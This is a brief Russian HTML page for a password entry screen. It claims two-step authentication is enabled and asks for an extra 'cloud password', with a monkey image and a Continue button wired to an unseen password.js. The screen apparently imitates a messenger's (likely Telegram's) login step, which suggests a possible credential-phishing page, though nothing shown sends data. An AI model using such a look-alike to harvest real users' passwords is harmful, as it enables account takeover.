<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Ваш пароль</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>

<div class="screen">

  <div class="center">

    <!-- ОБЕЗЬЯНА -->
    <img src="img/monkey.png" class="monkey-img" alt="monkey">

    <h1 class="title">Ваш пароль</h1>

    <p class="subtitle subtitle-center">
      Вы включили двухэтапную аутентификацию.<br>
      Теперь Ваш аккаунт защищён<br>
      дополнительным облачным паролем.
    </p>

    <!-- ПОЛЕ ПАРОЛЯ -->
    <input
      id="password-input"
      type="password"
      class="password-input"
      placeholder="Введите пароль"
    >

    <!-- НОВЫЙ ТЕКСТ ПОД INPUT -->
    <p class="set-password-link">Если пароль не установлен</p>

  </div>

  <button id="btn-password" class="btn disabled" disabled>
    Продолжить
  </button>

</div>

<script src="password.js"></script>

</body>
</html>
